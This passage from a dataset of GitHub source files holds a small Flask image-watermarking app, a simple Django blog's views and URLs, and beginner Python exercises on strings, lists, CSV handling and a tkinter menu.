0\n diffs = (mark.size[0] - im.size[0], mark.size[1] - im.size[1])\n mark = mark.crop((0, 0, \n mark.size[0] - diffs[0], \n mark.size[1] - diffs[1]))\n layer.paste(mark, (0,0))\n else:\n layer.paste(mark, position)\n \n # composite the watermark with the layer\n print(\"generated image\")\n return Image.composite(layer, im, layer)\n\ndef generate(img_path, out_path, watermark_path):\n print(img_path)\n print(out_path)\n print(watermark_path)\n im = Image.open(img_path)\n mark = Image.open(watermark_path)\n print(\"generating image\") \n watermark(im, mark,\n # position=(0,0),\n position=\"scale\",\n opacity=0.5).save(out_path, 'JPEG')\n\ndef test():\n img_path = \"./uploads/IMG_0014.JPG\"\n out_path = \"./target_images/wm_IMG_0014.JPG\"\n watermark_path = \"./assets/water.png\"\n generate(img_path, out_path, watermark_path)\n\nif __name__ == \"__main__\":\n test()\n # generate(\"./uploads/test2.jpg\",\n # \"./targets/wm_test2.jpg\",\n # \"./assets/water.png\")\n" }, { "alpha_fraction": 0.6592168807983398, "alphanum_fraction": 0.6638655662536621, "avg_line_length": 35.318180084228516, "blob_id": "c04dc79ec21b04bb4a85ba474fc5288eb9e6f506", "content_id": "02e14e7bafa543f8666ca4ac729f1d001ed81fc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5593, "license_type": "no_license", "max_line_length": 97, "num_lines": 154, "path": "/app.py", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "\"\"\"\n This is an image processing micro-app for \"We-Are-Water\"\n It uses Flask to serve a landing page where a client can\n apply a watermark to their images\n\n Images are temporarily stored in a ./uploads folder\n and are processed and saved to ./target_images \n and are returned to the client\n\n A scheduled maintenance jobs cleans upload directories ever so often\n\n\"\"\"\nimport os\n# We'll render HTML templates and access data sent by POST\n# using the request object from flask. Redirect and url_for\n# will be used to redirect the user once the upload is done\n# and send_from_directory will help us to send/show on the\n# browser the file that the user just uploaded\nfrom flask import Flask, render_template, request, redirect, url_for, send_from_directory\nfrom werkzeug import secure_filename\nfrom gen_watermark import generate\n\nimport glob\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\n# Constants\nFIVER = 5\nFIFTEEN_MINUTES = 60 * 15\nTHRITY_MINUTES = 60 * 30\nHOURLY = 60 * 60\n\n# Initialize the Flask application\napp = Flask(__name__)\n\n# This is the path to the upload directory\napp.config['UPLOAD_FOLDER'] = './uploads/'\napp.config['TARGET_FOLDER'] = './target_images/'\napp.config['ASSET_FOLDER'] = './assets/'\napp.config[\"WATERMARK_IMAGE\"] = \"./assets/water_lighter.png\"\n\n# These are the extension that we are accepting to be uploaded\napp.config['ALLOWED_EXTENSIONS'] = set(['png', 'jpg', 'jpeg', 'JPG', 'JPEG'])\n\n## start and schedule jobs\ndef maintain_dirs():\n \"\"\"\n Checks upload and target directories and removes file if necessary\n \"\"\"\n with app.app_context():\n upload_folder = app.config['UPLOAD_FOLDER']\n target_images_folder = app.config[\"TARGET_FOLDER\"]\n\n current_uploaded_items = glob.glob(upload_folder + \"*\")\n current_target_folder_items = glob.glob(target_images_folder + \"wm_*\")\n\n if len(current_uploaded_items) > 0:\n print(\"upload folder count: %s \" % len(current_uploaded_items))\n [os.remove(i) for i in current_uploaded_items]\n else:\n print(\"nothing to remove in upload folder\")\n\n if len(current_target_folder_items) > 0:\n print(\"target folder count: %s \" % len(current_target_folder_items))\n [os.remove(i) for i in current_target_folder_items]\n \n else:\n print(\"nothing to remove in target folder\")\n\napsched = BackgroundScheduler()\napsched.add_job(maintain_dirs, 'interval', seconds=THRITY_MINUTES)\napsched.start()\n## TODO: refactor into a different file\nprint(\"Initialized mainter\")\n\n# For a given file, return whether it's an allowed type or not\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n# This route will show a form to perform an AJAX request\n# jQuery is loaded to execute the request and update the\n# value of the operation\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n# Route that will process the file upload\n@app.route('/upload', methods=['POST'])\ndef upload():\n # Get the name of the uploaded file\n file = request.files['file']\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n\n # Move the file form the temporal folder to\n # the upload folder we setup\n full_originating_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(full_originating_path)\n \n watermarked_image_name = \"wm_\" + filename\n full_destination_path = os.path.join(app.config['TARGET_FOLDER'], watermarked_image_name)\n\n try:\n print(\"Generating watermark\")\n generate(full_originating_path, \n full_destination_path,\n app.config[\"WATERMARK_IMAGE\"])\n except:\n print(\"Something went wrong\")\n return redirect(url_for('err_file'), filename=\"something_wrong\")\n\n # Redirect the user to the uploaded_file route, which\n # will basicaly show on the browser the uploaded file\n print(\"Giving the uploaded file back\")\n return redirect(url_for('target_file',\n filename=watermarked_image_name))\n\n# This route is expecting a parameter containing the name\n# of a file. Then it will locate that file on the upload\n# directory and show it on the browser, so if the user uploads\n# an image, that image is going to be show after the upload\n@app.route('/uploads/<filename>')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\n@app.route('/err/<filename>')\ndef err_file(filename):\n return send_from_directory(app.config['ASSET_FOLDER'],\n filename)\n\n@app.route('/targets/<filename>')\ndef target_file(filename):\n return render_template('target.html', \n imageURL=url_for('target_images', filename=filename))\n # imageURL=os.path.join(app.config['TARGET_FOLDER'], filename))\n\n@app.route('/target_images/<filename>')\ndef target_images(filename):\n return send_from_directory(app.config['TARGET_FOLDER'],filename)\n\n\nif __name__ == '__main__':\n app.run(\n host=\"0.0.0.0\",\n port=int(\"8000\"),\n debug=True\n )\n\n\n# using the scaffold code from here:\n# http://code.runnable.com/UhLMQLffO1YSAADK/handle-a-post-request-in-flask-for-python\n" }, { "alpha_fraction": 0.49275362491607666, "alphanum_fraction": 0.695652186870575, "avg_line_length": 16.25, "blob_id": "3504c42d05ac31b680d55f2ecbf2214d6020904b", "content_id": "4965b44029f6d7c07e7b6d34a3bfd9d507d7f783", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 69, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/requirements.txt", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "APScheduler==3.3.1\ndecorator==4.0.10\nFlask==0.11.1\nFlask-Cors==2.1.2\n" }, { "alpha_fraction": 0.747989296913147, "alphanum_fraction": 0.7640750408172607, "avg_line_length": 30.08333396911621, "blob_id": "a5f7138e073a7b7bf3e735ccb19b0083ffec39cd", "content_id": "184b34b2cb5131988aae89aa3a639840165853e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 373, "license_type": "no_license", "max_line_length": 104, "num_lines": 12, "path": "/README.md", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "#### Tweebo clone watermark avatar generator for *We are water* social awareness campaign\n\nOnce you install the dependencies\n\n`pip install requirements.txt`\n\nyou can simply run `python app.py`\n\nApp by default binds to `port=8000i` and runs a scheduled maintenance job that clears all upload folders\n\n![](./uploads/library3-big.jpg)\n![](./target_images/wm_library3-big.jpg)\n" }, { "alpha_fraction": 0.6483970880508423, "alphanum_fraction": 0.6639090180397034, "avg_line_length": 27.47058868408203, "blob_id": "e3d787e1791e6127783481e0d7383bc0d1c4a57d", "content_id": "4c876181071222c09df8feb9668bd091752f844f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 967, "license_type": "no_license", "max_line_length": 76, "num_lines": 34, "path": "/maintainer.py", "repo_name": "karsiyakalilar/water-project", "src_encoding": "UTF-8", "text": "import os\nimport glob\nfrom apscheduler.scheduler import Scheduler\n\n\ndef maintain_dirs():\n \"\"\"\n Checks upload and target directories and cleans\n \"\"\"\n with app.app_context():\n upload_folder = app.config['UPLOAD_FOLDER']\n target_images_folder = app.config[\"TARGET_FOLDER\"]\n\n current_uploaded_items = glob.glob(upload_folder + \"*\")\n current_target_folder_items = glob.glob(target_images_folder, \"wm_*\")\n\n if len(current_uploaded_items) > 0:\n print(\"upload folder count: %s \" % len(current_uploaded_items))\n print(\"removing yoself\")\n\n if len(current_target_folder_items) > 0:\n print(\"target folder count: %s \" % len(current_target_folder_items))\n print(\"removing yoself\")\n\nFIVER = 5\nFIFTEEN_MINUTES = 60 * 15\nTHRITY_MINUTES = 60 * 30\nHOURLY = 60 * 60\n\n@app.before_first_request\ndef initialize():\n apsched = Scheduler()\n apsched.start()\n apsched.add_interval_job(maintain_dirs, seconds=FIVER)" } ]
5
LeeJumi/blog-formproject
https://github.com/LeeJumi/blog-formproject
a0fd934e3b8199e941c4dff657922b6aea540c65
3f7a00b6846667f51bbb8b2cc221e60627d77249
60c0c4fa43760bd35cf586954cd9e1bbbaf4b1e3
refs/heads/master
2022-08-04T12:01:17.880931
2020-05-30T11:32:24
2020-05-30T11:32:24
268,066,934
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6417419910430908, "alphanum_fraction": 0.6417419910430908, "avg_line_length": 35.90909194946289, "blob_id": "a5b8bed0e815eec879f10de949a98eee6f15e707", "content_id": "f77d88759d7afdfb53fe5a1f969c7f437c6a0361", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1547, "license_type": "no_license", "max_line_length": 95, "num_lines": 33, "path": "/hello/views.py", "repo_name": "LeeJumi/blog-formproject", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom .models import Blog #모델의 존재를 알려주는 코드\nfrom django.utils import timezone #장고 안에 있는 타임존을 임포트하라는 뜻\nfrom .forms import BlogPost\n# Create your views here.\ndef home(request):\n blog = Blog.objects.all() #blog라는 변수안에 Blog모델의 objects객체 all()전부를 넣어줘\n return render(request,'home.html',{'blogs':blog})#blog에 담은 것들을 blogs라는 이름으로 home.html에 전해줘\n\n\ndef create(request):\n if request.method == 'POST': #POST로 요청이 들어오면 \n blog = Blog()#Blog 모델의 내용들을 blog라는 변수에 담고\n blog.title = request.POST['title'] #블로그라는 이름에 담긴 내용을 타이틀이란 이름으로 가져옴\n blog.body = request.POST['body'] #블로그라는 이름에 담긴 내용을 바디이란 이름으로 가져옴 (바디라고 모델에 적었으니 통일시켜야함)\n blog.pub_date = timezone.datetime.now()#시간을 가져올 것\n blog.save()#블로그를 저장할 것\n\n return redirect('/') \n else:\n return render(request, 'create.html')\n\ndef blogpost(request):\n if request.method =='POST':\n form = BlogPost(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.pub_date=timezone.now()\n post.save()\n return redirect('home')\n else:\n form = BlogPost()\n return render(request,'new.html',{'forms':form})" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.699999988079071, "avg_line_length": 28, "blob_id": "ac3d9731837302a86c8291e947d7bd01add34602", "content_id": "b81458f13b75fc3a67820f0574345b242e9aa344", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 28, "num_lines": 1, "path": "/hello/url.py", "repo_name": "LeeJumi/blog-formproject", "src_encoding": "UTF-8", "text": "\n\n#코드오류를 해결할 수 없어 이부분은 생략했습니다." }, { "alpha_fraction": 0.7289377450942993, "alphanum_fraction": 0.7289377450942993, "avg_line_length": 35.06666564941406, "blob_id": "2b6c1fb06340bbf27a4cb35ff0d646b8d0acca9a", "content_id": "8e5465f7c221231bf0957eb84d6994cd3b939fd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 546, "license_type": "no_license", "max_line_length": 76, "num_lines": 15, "path": "/firstsite/urls.py", "repo_name": "LeeJumi/blog-formproject", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.urls import path\nimport hello.views\nimport portfolio.views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', hello.views.home, name='home'),\n path('newblog/',hello.views.blogpost, name=\"newblog\"),\n path('create/',hello.views.create, name='create'),\n path('portfolio/', portfolio.views.portfolio, name='portfolio'),\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n\n\n\n\n" } ]
3
timgates42/pyramid_mailgun
https://github.com/timgates42/pyramid_mailgun
7ee9e36ac9e72687e120e27d2497db73ebd61771
f056f269cd2977dad583fc35a56fc01a4d2761a2
e1b25c52d706293b4e32140440a21271aad8e585
refs/heads/master
2021-05-17T23:22:55.942739
2016-01-28T01:11:39
2016-01-28T01:11:39
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6269592642784119, "alphanum_fraction": 0.6394984126091003, "avg_line_length": 28, "blob_id": "ca5acda3e4486d3f5f79715a74f682045157214e", "content_id": "e12448347c93debc3d220fa0921928d170a47bc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 638, "license_type": "no_license", "max_line_length": 60, "num_lines": 22, "path": "/setup.py", "repo_name": "timgates42/pyramid_mailgun", "src_encoding": "UTF-8", "text": "try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nsetup(\n name='pyramid_mailgun',\n version='0.0.3dev',\n packages=['pyramid_mailgun',],\n description='Mailgun integration for Pyramid framework',\n author='Evan Nook',\n author_email='evan@innonook.com',\n url='https://github.com/evannook/pyramid_mailgun',\n license='MIT',\n long_description=open('README.txt').read(),\n install_requires = ['requests'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ]\n)\n" }, { "alpha_fraction": 0.6089385747909546, "alphanum_fraction": 0.6108007431030273, "avg_line_length": 27.263158798217773, "blob_id": "4224f53e87801741b94a319622edacfe5fd0ca9f", "content_id": "b089942d7dcac38a69d18f73a1a2fcdf217c3073", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 537, "license_type": "no_license", "max_line_length": 78, "num_lines": 19, "path": "/pyramid_mailgun/__init__.py", "repo_name": "timgates42/pyramid_mailgun", "src_encoding": "UTF-8", "text": "class Mailer:\n\n def __init__(self, settings):\n self.domain_name = settings['mailgun.domain_name']\n self.api_key = settings['mailgun.api_key']\n\n def send(self, email):\n import requests\n requests.post(\n \"https://api.mailgun.net/v3/{}/messages\".format(self.domain_name),\n auth=(\"api\", self.api_key),\n data=email\n )\n\ndef mailer(request):\n return Mailer(request.registry.settings)\n\ndef includeme(config):\n config.add_request_method(mailer, 'mailer', reify=True)\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 62, "blob_id": "8644f536a298d70b362a5c0f0da539203f56f8d5", "content_id": "cbbbdb5b06798cfe845f357aa8a756472079083c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 63, "license_type": "no_license", "max_line_length": 62, "num_lines": 1, "path": "/README.txt", "repo_name": "timgates42/pyramid_mailgun", "src_encoding": "UTF-8", "text": "This package integrate Mailgun service with Pyramid framework.\n" } ]
3
TatianaVelychko/Python-Projects
https://github.com/TatianaVelychko/Python-Projects
f0c2c8d0d3701d2e6a405f210a87e003e8c152f3
c0383677e61c4c67d268c670a790082b249ae3d4
8c2379d42bb868fbbcdae4ded8cb7ac556bcca53
refs/heads/master
2021-07-10T07:52:41.295478
2019-03-05T09:18:07
2019-03-05T09:18:07
146,572,340
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3731931746006012, "alphanum_fraction": 0.46780550479888916, "avg_line_length": 15.191489219665527, "blob_id": "303dbb1999a6f07e3d4f38768501811e37000226", "content_id": "31889492fbf03fe8a222b340a712c7429c997a02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 788, "license_type": "no_license", "max_line_length": 134, "num_lines": 47, "path": "/lab4.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "#1\n\na = []\nk = 1\nfor r in range(5):\n a.append([])\n for c in range(5):\n a[r].append(k)\n k += 1\n\nfor r in a:\n print(r)\nprint(sum(sum([i for i in x])for x in a))\n\n#2\n\nL = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\ndel L[:2]\nL.extend([11, 12])\n\ndel L[1::2]\nL.extend([11, 12])\n\ndel L[3:8]\nL.extend([11, 12])\n\nL.insert(0, [1, 2, 3, 4, 5])\ndel L[2::2]\n\nprint(L)\n\n#3\n\nmy_len = [['БО-331101', ['Акулова Алена', 'Бабушкина Ксения', 'Зябликова Анастасия']], ['БВ-421102', ['Громова Евгения', 'Кудрявцева Анна']], ['БО-331103', ['Караваева Светлана']]]\n\ns = my_len.pop(0)\nprint(s[0], '\\n', '\\n'.join(s[1]))\n\nK = my_len.pop(0)\nprint(K[0], ':', ', '.join(K[1]))\n\nfor k in my_len:\n print(k[0], '\\n', '\\n'.join(k[1]))\n\nfor S in my_len:\n if S[0].startswith('БО'):\n print(S[0], ':', ', '.join(S[1]))\n" }, { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 15, "blob_id": "f5ed66ada4e7c3368e86af672d4f6343aad379a4", "content_id": "075cdef3f789feceb9f8daa1a8f60b272cea67d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 32, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/README.md", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "# Python-Projects\ntest projects\n" }, { "alpha_fraction": 0.560026228427887, "alphanum_fraction": 0.589547336101532, "avg_line_length": 27.12738800048828, "blob_id": "acac8366bb8281ada35f0ec76aef1ca3c4e30acb", "content_id": "31a5b0ceb66cf2f8c482bb8fdc3e8882ce4a3940", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5143, "license_type": "no_license", "max_line_length": 355, "num_lines": 157, "path": "/lab_6.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "from tkinter import *\r\n\r\n\r\ndef input_values(a, b, c, k):\r\n try:\r\n counter = ((a ** 2 / b ** 2 + c ** 2 * a ** 2) / (a + b + c * (k - a / b ** 3)) + c + (k / b - k / a) * c)\r\n print(abs(counter))\r\n except ZeroDivisionError:\r\n print(\"Division by zero!\")\r\n\r\n\r\nprint('Введите значения')\r\ninput_values(int(input()), int(input()), int(input()), int(input()))\r\n\r\nnum_list = [12, 3, 10, 14.2, 2.1, -10]\r\n\r\n\r\ndef summarize():\r\n print(sum(i for i in num_list if i > 10))\r\n\r\n\r\ndef maximum():\r\n print(max(num_list))\r\n\r\n\r\nlist_misc = [1, 2, 4, 2.2, 6, 'text', 4.1, -2]\r\n\r\n\r\ndef give_even():\r\n for i in list_misc:\r\n try:\r\n if i % 2 == 0:\r\n print(i)\r\n except TypeError:\r\n continue\r\n\r\n\r\nmy_number = 4\r\n\r\n\r\ndef cycle():\r\n while True:\r\n print('Enter user number')\r\n user_number = float(input())\r\n if user_number >= my_number:\r\n print('Try again')\r\n else:\r\n print('Great!')\r\n break\r\n\r\n\r\nlist_given = ['repeat', 'retest', 'hello', '', '1234567890']\r\n\r\n\r\ndef strings():\r\n print('\\n'.join([elem for elem in list_given if 5 < len(elem) < 10]))\r\n\r\n\r\nfrom random import randint\r\n\r\n\r\ndef chars():\r\n for _ in range(5):\r\n print(chr(randint(1040, 1071)), end='')\r\n\r\n\r\nsentence_misc = 'repeat retest 6.2 hello 5 1234567890 0.1 -4'\r\n\r\n\r\ndef digit():\r\n print(', '.join(x for x in sentence_misc if x.isdigit()))\r\n\r\n\r\nimport string\r\n\r\nsentence = 'Пусть дана строка, состоящая из слов, пробелов и знаков препинания.'\r\nexclude = set(string.punctuation)\r\nsentence_first = ''.join(char for char in sentence if char not in exclude)\r\n\r\nsentence_list = sentence_first.split()\r\n\r\n\r\ndef words():\r\n word = ([elem for elem in sentence_list if len(elem) > 5])\r\n print(', '.join(word))\r\n\r\n\r\nfirst_string = 'Ф;И;О;Возраст;Категория;Иванов;Иван;Иванович;23 года;Студент 3 курса;Петров;Семен;Игоревич;22 года;Студент 2 курса'\r\n\r\nM = first_string.split(';')\r\n\r\n\r\ndef table():\r\n print(''.join(M[0:3]), '\\t', '\\t'.join(M[3:5]))\r\n print(' '.join(M[5:8]), '\\t', '\\t'.join(M[8:10]))\r\n print(' '.join(M[-5:-2]), '\\t', '\\t'.join(M[-2:]))\r\n\r\n\r\nsecond_string = 'ФИО;Возраст;Категория;Иванов Иван Иванович;23 года;Студент 3 курса;Петров Семен Игоревич;22 года;Студент 2 курса;Иванов Семен Игоревич;22 года;Студент 2 курса;Акибов Ярослав Наумович;23 года;Студент 3 курса;Борков Станислав Максимович;21 год;Студент 1 курса;Петров Семен Семенович;21 год;Студент 1 курса;Романов Станислав Андреевич;23 года;Студент 3 курса;Петров Всеволод Борисович;21 год;Студент 2 курса'\r\n\r\nitem = second_string.split(';')\r\n\r\nn = 3\r\nnew_list = [item[i:i+n] for i in range(0, len(item), n)]\r\n\r\n\r\ndef surname():\r\n for x in new_list:\r\n for y in x:\r\n if y.startswith('Петров'):\r\n print(' '.join(x))\r\n\r\n\r\nrand_string = 'Пусть дана строка произвольной длины. Выведите информацию о том, сколько в ней символов и сколько слов.'\r\n\r\n\r\ndef length():\r\n print(len(rand_string))\r\n print(len(rand_string) - rand_string.count(' '))\r\n print(len(rand_string.split(' ')))\r\n\r\n\r\nwhile True:\r\n user_input = input('Вы хотите продолжить?')\r\n if user_input == 'yes':\r\n root = Tk()\r\n mainmenu = Menu(root)\r\n root.config(menu=mainmenu)\r\n\r\n usermenu1 = Menu(mainmenu)\r\n usermenu1.add_command(label='Пример', command=lambda: input_values(int(input()), int(input()), int(input()), int(input())))\r\n usermenu1.add_command(label='Сумма', command=lambda: summarize())\r\n usermenu1.add_command(label='Максимум', command=lambda: maximum())\r\n usermenu1.add_command(label='Четные', command=lambda: give_even())\r\n\r\n usermenu2 = Menu(mainmenu)\r\n usermenu2.add_command(label='Число', command=lambda: cycle())\r\n usermenu2.add_command(label='Строки', command=lambda: strings())\r\n usermenu2.add_command(label='Буквы', command=lambda: chars())\r\n usermenu2.add_command(label='Цифры', command=lambda: digit())\r\n\r\n usermenu3 = Menu(mainmenu)\r\n usermenu3.add_command(label='Слова', command=lambda: words())\r\n usermenu3.add_command(label='Таблица', command=lambda: table())\r\n usermenu3.add_command(label='Фамилия', command=lambda: surname())\r\n usermenu3.add_command(label='Длина', command=lambda: length())\r\n\r\n mainmenu.add_cascade(label='Меню 1', menu=usermenu1)\r\n mainmenu.add_cascade(label='Меню 2', menu=usermenu2)\r\n mainmenu.add_cascade(label='Меню 3', menu=usermenu3)\r\n\r\n root.mainloop()\r\n continue\r\n elif user_input == 'no':\r\n break\r\n else:\r\n continue\r\n" }, { "alpha_fraction": 0.595952570438385, "alphanum_fraction": 0.6315422058105469, "avg_line_length": 25.314815521240234, "blob_id": "2748ea9dad255835e053e76a7696a0161ba5191c", "content_id": "c0a8f74822ffd4490dacfc6778cf6c1bb90aaf48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1881, "license_type": "no_license", "max_line_length": 333, "num_lines": 54, "path": "/lab3.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "#1\n\nimport string\n\nL = 'Пусть дана строка, состоящая из слов, пробелов и знаков препинания.'\nexclude = set(string.punctuation)\nK = ''.join(ch for ch in L if ch not in exclude)\n\nS = K.split()\n\nM = ([elem for elem in S if len(elem) > 5])\nprint('\\t'.join(M))\n\nH = ([elem for elem in S if elem.endswith('ов')])\nprint('\\t'.join(H))\n\n#2\n\nmy_string = 'Ф;И;О;Возраст;Категория;Иванов;Иван;Иванович;23 года;Студент 3 курса;Петров;Семен;Игоревич;22 года;Студент 2 курса'\n\nM = my_string.split(';')\nprint(M)\n\nprint(''.join(M[0:3]), '\\t', '\\t'.join(M[3:5]))\nprint(' '.join(M[5:8]), '\\t', '\\t'.join(M[8:10]))\nprint(' '.join(M[-5:-2]), '\\t', '\\t'.join(M[-2:]))\n\n#3\n\nmy_string = 'ФИО;Возраст;Категория;Иванов Иван Иванович;23 года;Студент 3 курса;Петров Семен Игоревич;22 года;Студент 2 курса;Иванов Семен Игоревич;22 года;Студент 2 курса;Акибов Ярослав Наумович;23 года;Студент 3 курса;Борков Станислав Максимович;21 год;Студент 1 курса;Петров Семен Семенович;21 год;Студент 1 курса;Романов Станислав Андреевич;23 года;Студент 3 курса;Петров Всеволод Борисович;21 год;Студент 2 курса'\n\nS = my_string.split(';')\nprint(S)\n\nn = 3\r\nD = [S[i:i+n] for i in range(0, len(S), n)]\r\nprint(D)\r\n\r\nfor x in D:\r\n for y in x:\r\n if y.startswith('Петров'):\r\n print(' '.join(x))\r\n\r\nfor z in D:\r\n if '21 год' in z:\r\n print(' '.join(z))\n\n#4\n\nL = 'Пусть дана строка произвольной длины. Выведите информацию о том, сколько в ней символов и сколько слов.'\n\nprint(len(L))\r\nprint(len(L) - L.count(' '))\r\nprint(len(L.split(' ')))" }, { "alpha_fraction": 0.42810457944869995, "alphanum_fraction": 0.4444444477558136, "avg_line_length": 16, "blob_id": "9192a0b1f1d668566e35878d20a5569d4bb44fcb", "content_id": "a33153403dcc7518e00a92b70cd0602e6b5210ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 306, "license_type": "no_license", "max_line_length": 104, "num_lines": 18, "path": "/task1.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "print(\"a=\")\na = int(input())\n\nprint(\"b=\")\nb = int(input())\n\nprint(\"c=\")\nc = int(input())\n\nprint(\"k=\")\nk = int(input())\n\ntry:\n S = ((a ** 2 / b ** 2 + c ** 2 * a ** 2) / (a + b + c * (k - a / b ** 3)) + c + (k / b - k / a) * c)\n print(abs(S))\n\nexcept ZeroDivisionError:\n print(\"Division by zero!\")\n" }, { "alpha_fraction": 0.4853146970272064, "alphanum_fraction": 0.5412587523460388, "avg_line_length": 22.65517234802246, "blob_id": "dcd3f4d807ff1694a3a7ec110eb42dd84f132aa2", "content_id": "fb37c8164e5ef2bd299ca0ca35082f44996b2684", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 741, "license_type": "no_license", "max_line_length": 69, "num_lines": 29, "path": "/lab5_2-4.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "import csv\r\n\r\nmyf = open('students.csv', 'w')\r\nmyf.write('№;ФИО;Возраст;Группа\\n')\r\nmyf.write('4;Мамаев Олег Борисович;25;БО-333333\\n')\r\nmyf.write('2;Сидоров Семен Семенович;23;БО-111111\\n')\r\nmyf.write('1;Иванов Иван Иванович;23;БО-111111\\n')\r\nmyf.write('3;Яшков Илья Петрович;24;БО-222222\\n')\r\nmyf.close()\r\n\r\nwith open('students.csv', 'r') as myf:\r\n reader = csv.reader(sorted(myf, key=lambda li: li.split(';')[1]))\r\n lst = [row for row in reader]\r\n\r\nprint(lst)\r\n\r\nmyf = open('students.csv', 'w')\r\nfor elem in lst:\r\n for myst in elem:\r\n el = myst.split(';')\r\n try:\r\n el[2] = str(int(el[2]) + 1)\r\n myf.write(';'.join(el))\r\n myf.write('\\n')\r\n\r\n except ValueError:\r\n pass\r\n\r\nprint(\"Writing complete\")\r\n" }, { "alpha_fraction": 0.5128205418586731, "alphanum_fraction": 0.5897436141967773, "avg_line_length": 17.28125, "blob_id": "a294a155078b028343b9c43b0df291d77399eeac", "content_id": "8e71e03afc5203bdd51face98ee2d0ef9278590c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 585, "license_type": "no_license", "max_line_length": 51, "num_lines": 32, "path": "/lab2.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "# task 1\n\nimport random\n\nmy_number = random.randint(5, 15)\n\nwhile True:\n print('Enter user number')\n user_number = float(input())\n if user_number >= my_number:\n print('Try again')\n else:\n print('Great!')\n break\n\n# task 2\n\nL = ['repeat', 'retest', 'hello', '', '1234567890']\nS = ([elem for elem in L if 5 < len(elem) < 10])\nprint('\\n'.join(S))\n\n# task 3\n\nfrom random import randint\n\nfor _ in range(5):\n print(chr(randint(1040, 1071)), end='')\n\n# task 4\n\nS = 'repeat retest 6.2 hello 5 1234567890 0.1 -4'\nprint('\\a'.join(x for x in S if x.isdigit()))\n" }, { "alpha_fraction": 0.5053191781044006, "alphanum_fraction": 0.5797872543334961, "avg_line_length": 12.5, "blob_id": "7f265206458100dafd5b753966bd9b653e87c04d", "content_id": "f52473b88bdc64c0644255fb21897a5edf729bb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "no_license", "max_line_length": 36, "num_lines": 14, "path": "/task3,4.py", "repo_name": "TatianaVelychko/Python-Projects", "src_encoding": "UTF-8", "text": "b = [12, 3, 10, 14.2, 2.1, -10]\n\na = sum(i for i in b if i>10)\nprint(a)\n\nc = max(b)\nprint(c)\n\nd = sum(b)/len(b)\nprint(d)\n\nfrom functools import reduce\n\nprint(reduce(lambda x, y: x * y, b))" }, { "alpha_fraction": 0.6263736486434937, "alphanum_fraction": 0.6263736486434937, "avg_line_length": 32.125, "blob_id": "8f83c174792e7fd56268c757c4b0a892131c8d2f", "content_id": "c521ab180c19b9107ad36f1c99e823ca46904c45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 273, "license_type": "no_license", "max_line_length": 89, "num_lines": 8, "path": "/lab5_1.py", "repo_name": "TatianaVelychko/Python-Projects", 